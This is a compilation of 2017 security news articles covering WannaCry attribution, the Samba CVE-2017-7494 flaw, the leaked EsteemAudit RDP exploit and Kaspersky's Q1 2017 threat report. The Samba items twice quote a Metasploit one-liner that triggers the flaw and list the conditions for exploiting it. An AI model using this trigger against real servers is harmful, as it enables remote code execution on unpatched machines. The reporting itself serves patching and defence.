Check Point nezveřejnil detaily hack a exploit ještě také nepublikoval. Upozornil ale tvůrce softwaru a ti už vydali první opravy. Jen u Kodi jsou zatím k dispozici pouze zdrojové kódy, nikoliv připravený binární instalátor.

Jury Out on North Korea Link to Ransomware Attack

25.5.2017 securityweek Ransomware

Was North Korea behind the ransomware epidemic that hit global computer networks earlier this month?

That's the subject of heated debate in cybersecurity circles after analysts found similarities in the "WannaCry" worm to other malware attributed to North Korea, including the 2014 hack of Sony Pictures and a cyberheist of millions of dollars from the Bangladesh central bank.

The security firm Symantec this week said the shared code makes it "highly likely" that the attacks were connected to the hacker group given the code name Lazarus, which many believe is North Korean.

Israel-based cybersecurity firm Intezer last week reached a similar conclusion, finding that WannaCry had "strong links to other malware families, believed to be developed by North Korean hackers, or known to be used in attacks against South Korean organizations."

Russian-based security firm Kaspersky Lab and others also pointed to a likely North Korean link.

While the evidence is not conclusive -- hackers can often hide or "spoof" their real identities -- North Korea is emerging as one of the likely suspects despite a strong denial by the Pyongyang envoy to the United Nations, some analysts say.

Symantec researchers said that despite the likely North Korea link, the WannaCry attacks "do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign."

- Desperate for cash -

"I could easily see North Korea doing this as a way to get money," said Paul Benda, a Pentagon and Department of Homeland Security official who is now chief technology officer at Global Security and Innovative Strategies, a Washington consultancy.

"With the sanctions they are under they need cold hard cash."

Other analysts have noted that sanctions squeezing Pyongyang may be prompting desperate actions to raise cash through various channels, including cybercrime.

"While years of sanctions have isolated the Hermit Kingdom from much of the global financial system, North Korea may be seeking to fund the state's coffers through a widespread cybercrime campaign," said FireEye analyst Luke McNamara in a recent post on the Lawfare blog.

Paradoxically, he said, the effort to persuade and other nations to pressure North Korea may be encouraging further cyberattacks: "Pyongyang would be left with few options to compensate for lost income that it could ramp up as quickly as cybercrime."

The attacks discovered last week caused havoc in global computer networks, affecting as many as 300,000 machines in 150 countries and disrupting governments and several industries. The hackers developed the virus to exploit a flaw exposed in leaked documents from the National Security Agency.

- Inconsistencies -

But despite the growing concerns over North Korea, some analysts say it's too soon to point the finger and cite inconsistencies with the Pyongyang connection.

The WannaCry attack appeared unsophisticated: researchers were able to halt the spread with a $10 purchase of a web domain that activated a "kill switch."

And various estimates showed the "ransom" raised amounted to a paltry $116,000 from 302 entities more than a week after computers were locked down.

James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, said WannaCry was "barely functional" and spread widely only because of the large number of networks and computers which failed to upgrade security and were vulnerable to the self-replicating "worm."

The hackers known as Lazarus are a sophisticated cybermercenary group, Scott told AFP. "They use elaborate traps, obfuscation techniques and wipers to eliminate digital footprints. This (WannaCry) has none of that."

More likely, Scott said, is that the attacks were carried out by hackers from China's People's Liberation Army "moonlighting" in their spare time.

Scott, who disputes the widely held belief that the Lazarus group is North Korean, said it is possible that Pyongyang has outsourced some of its cybercrime to these freelance Chinese hackers.

Analysts at Boston-based security firm Cybereason also questions the role of North Korea.

"Nothing in North Korea's past cyber campaigns or in their conventional military and foreign policy fit this mold," the researchers said in a blog.

John Arquilla, chair of defense analysis at the Naval Postgraduate School, said that despite the common patterns in the recent attacks, cyber forensics still have a long way to go to positively identify the source of an attack.

"We are not at the level of CSI," he said, referring to the popular television criminal forensics show. "We have to be very careful about the potential for deception. I would not rush to take military or economically coercive actions on the basis of what might or might not be the truth" on the source of the attacks, Arquilla said.

Samba Patches Code Execution Flaw Introduced in 2010

25.5.2017 securityweek Vulnerebility

The developers of the Samba interoperability software suite announced on Wednesday the availability of security updates that patch a serious remote code execution vulnerability. Researchers have warned that there are many vulnerable systems accessible directly from the Internet.

The flaw, tracked as CVE-2017-7494, affects all versions of Samba since 3.5.0, released in March 2010. The security hole has been addressed in versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

According to Samba maintainers, the vulnerability allows a malicious client to upload a shared library to a writable share, and cause the server to load and execute that file.

The vulnerability exposes various types of systems to attacks, including Linux and network-attached storage (NAS) devices. Rapid7 has warned that many users may not even realize that their systems are running Samba.

Samba provides file and print sharing capabilities between Windows and Unix computers, and it implements many protocols, including SMB, which malicious actors leveraged in the recent WannaCry ransomware attacks. This has led some experts to believe that CVE-2017-7494 could also be exploited for similar worm attacks.

“Unlike SMB, Samba exists on a wide variety of systems from different makers - servers, laptops, home routers, network storage systems, media servers, and many IoT devices. And unlike Windows, those devices may not automatically install an update - even if the manufacturer provides one,” researcher David Longenecker said in a blog post.

Exploiting the vulnerability is easy and proof-of-concept (PoC) code has already been made public, which could lead to in-the-wild attacks. HD Moore, VP of research and development at Atredis, has created a Metasploit module for CVE-2017-7494 and showed how the flaw can be exploited on Ubuntu and a Synology NAS product.

Follow
HD Moore @hdmoore
Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")
8:23 PM - 24 May 2017
231 231 Retweets 243 243 likes
Twitter Ads info & Privacy

A scan conducted by Rapid7 with its Project Sonar showed more than 104,000 Internet-exposed endpoints running a vulnerable version of Samba, and nearly 90 percent of these systems had been running outdated versions of the software.

Individuals and organizations that still use older versions of Samba can prevent attacks by adding the parameter “nt pipe support = no” to the global section of their smb.conf file. RedHat also pointed out that the SELinux security module blocks potential exploits.

CVE-2017-7494 Samba vulnerability, patch your installation now!
25.5.2017 securityaffairs Vulnerebility

A seven-year-old remote code execution vulnerability, tracked as CVE-2017-7494, affects all versions of the Samba software since 3.5.0.
A seven-year-old remote code execution vulnerability affects all versions of the Samba software since 3.5.0. The flaw has been patched by the development team of the project. An attacker can exploit the CVE-2017-7494 RCE to upload a shared library to a writable share, and then cause the server to load and execute it.

The popular CVE-2017-7494 flaw can be easily exploited, just a line of could be used for the hack under specific conditions:

make file- and printer-sharing port 445 reachable on the Internet,
configure shared files to have write privileges.
use known or guessable server paths for those files.
Follow
HD Moore @hdmoore
Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")
8:23 PM - 24 May 2017
231 231 Retweets 243 243 likes
Twitter Ads info & Privacy
Those requirements include vulnerable computers that (a) make file- and printer-sharing port 445 reachable on the Internet, (b) configure shared files to have write privileges, and (c) use known or guessable server paths for those files. When those conditions are satisfied, remote attackers can upload any code of their choosing and cause the server to execute it, possibly with unfettered root privileges, depending on the vulnerable platform.

“All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.” reads the security advisory issued by Samba.
The announcement published by Samba informed users that a patch addressing this remote code execution vulnerability tracked as CVE-2017-7494 was available at the following URL:

http://www.samba.org/samba/security/

Sysadmins have to patch their versions as soon as possible, if it is not possible for any reason a workaround can be implemented by the adding the line

nt pipe support = no
to their Samba configuration file and restarting the network’s SMB daemon.

The change will limit clients from accessing some network computers.

“Additionally, Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.”

The Samba bug appears to be a network wormable issue that could be exploited by a malicious code to self-replicate from vulnerable machine to vulnerable machine without requiring user interaction.
Hurry up, the exploit for the Samba bug is expected to be available in the days for the Metasploit framework.

HD Moore, who is vice president of research and development at Atredis Partners, posted the following images showing successful exploits against Samba on a computer running Ubuntu and NAS device made by Synology.

HD Moore @hdmoore
Examples of exploiting Samba CVE-2017-7494 on Ubuntu 16.04 and a Synology NAS. Metasploit module should be PRd sometime in the next 24 hours
11:20 PM - 24 May 2017
469 469 Retweets 387 387 likes
Twitter Ads info & Privacy
ubuntu samba exploit

The first crack at a Metasploit PR for Samba CVE-2017-7494 already appeared on GitHub.

Follow
HD Moore @hdmoore
First crack at a Metasploit PR for Samba CVE-2017-7494: https://github.com/rapid7/metasploit-framework/pull/8450 …
2:50 AM - 25 May 2017
Photo published for First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework
First crack at Samba CVE-2017-7494 by hdm · Pull Request #8450 · rapid7/metasploit-framework
This PR contains a module for the Samba arbitrary module loading vulnerability. It also includes support for x86 and ARMLE elf-so template formats. This has been extensively tested against an updat...
github.com
171 171 Retweets 161 161 likes

Wanna Cry Again? NSA’s Windows 'EsteemAudit' RDP Exploit Remains Unpatched
25.5.2017 thehackernews Ransomware

Brace yourselves for a possible 'second wave' of massive global cyber attack, as SMB (Server Message Block) was not the only network protocol whose zero-day exploits created by NSA were exposed in the Shadow Brokers dump last month.
Although Microsoft released patches for SMB flaws for supported versions in March and unsupported versions immediately after the outbreak of the WannaCry ransomware, the company ignored to patch other three NSA hacking tools, dubbed "EnglishmanDentist," "EsteemAudit," and "ExplodingCan."
It has been almost two weeks since WannaCry ransomware began to spread, which infected nearly 300,000 computers in more than 150 countries within just 72 hours, though now it has been slowed down.
For those unaware, WannaCry exploited a Windows zero-day SMB bug that allowed remote hackers to hijack PCs running on unpatched Windows OS and then spread itself to other unpatched systems using its wormable capability.
EsteemAudit: Over 24,000 PCs Still Vulnerable
EsteemAudit is another dangerous NSA-developed Windows hacking tool leaked by the Shadow Brokers that targets RDP service (port 3389) on Microsoft Windows Server 2003 / Windows XP machines.
Since Microsoft no longer support Windows Server 2003 and Windows XP and unlike EternalBlue the company has not released any emergency patch for EsteemAudit exploit so far, over 24,000 vulnerable systems remains still exposed on the Internet for anyone to hack.
"Even one infected machine opens your enterprise to greater exploitation," says enSilo, a cyber security firm who came up with the AtomBombing attack last year and now has released an unofficial patch for EsteemAudit, which we have introduced later in this article.
EsteemAudit can also be used as a wormable malware, similar to the WannaCry ransomware, which allows hackers to propagate in the enterprise networks, leaving thousands of systems vulnerable to ransomware, espionage and other malicious attacks.
Ransomware authors, such as criminals behind CrySiS, Dharma, and SamSam, who are already infecting computers via RDP protocol using brute force attacks, can leverage EsteemAudit anytime for widespread and damaging attacks like WannaCry.
How to Secure Your Computers?

Due to the havoc caused by WannaCry, SMB service gained all the attention, neglecting RDP.
"Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today, and the cyber security industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of the global market share," enSilo says.
Since Microsoft has not released any patch for this vulnerability, users and enterprises are advised to upgrade their systems to the higher versions to secure themselves from EsteenAudit attacks.
"Of the three remaining exploits, “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan,” none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk," Microsoft says.
If it's hard for your enterprise to upgrade their systems immediately, it's good for them to secure their RDP port by either disabling it or putting it behind the firewall.
Meanwhile, enSilo has released a patch to help Windows XP and Server 2003 users secure their machines against EsteemAudit. You can apply the patch to secure your systems, but keep in mind, that it is not an official patch from Microsoft.
If you have any doubt on the patch, enSilo is a reputed cyber security company, though I expect Microsoft to release an official patch before any outcry like that of WannaCry.

IT threat evolution Q1 2017
25.5.2017 Kaspersky Analysis

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn’t always the goal. Sometimes attackers erase data instead of – or as well as – trying to gain access to confidential information. We’ve seen several wiper attacks in recent years. They include Shamoon (also known as ‘Disttrack’), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the attack on Sony Pictures in 2013.

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN) is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with an APT group known as NewsBeef (also known as ‘Charming Kitten’), so-called because of its use of the Browser Exploitation Framework (BEeF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn’t known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target – the latter seems most likely to us.

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

EyePyramid

As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Out initial YARA rule highlighted two samples which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try and mask the extension of the file – underlining the low level of sophistication of the attacks.

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages, pictures. The app is also able to record video and audio.

The IDF, which led the research along with Kaspersky lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker´s C2.

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor‘. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories

Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life! Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. One they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built-in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home, is to ensure the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large scale attack also highlights the need for manufacturers to consider security by design, rather as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.

7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely
25.5.2017 thehackernews Vulnerebility
A 7-year-old critical remote code execution vulnerability has been discovered in Samba networking software that could allow a remote attacker to take control of an affected Linux and Unix machines.
Samba is an open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system.
The newly discovered remote code execution vulnerability (CVE-2017-7494) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.
Linux version of EternalBlue Exploit?

According to the Shodan computer search engine, more than 485,000 Samba-enabled computers exposed port 445 on the Internet, and according to researchers at Rapid7, more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, out of which 92,000 are running unsupported versions of Samba.
Since Samba is the SMB protocol implemented on Linux and UNIX systems, so some experts are saying it is "Linux version of EternalBlue," used by the WannaCry ransomware.
...or should I say SambaCry?
Keeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities.
Home networks with network-attached storage (NAS) devices could also be vulnerable to this flaw.
Exploit Code Released! (Bonus: Metasploit Module)

The flaw actually resided in the way Samba handled shared libraries. A remote attacker could use this Samba arbitrary module loading vulnerability to upload a shared library to a writable share and then cause the server to load and execute malicious code.
The vulnerability is hell easy to exploit. Just one line of code is required to execute malicious code on the affected system.
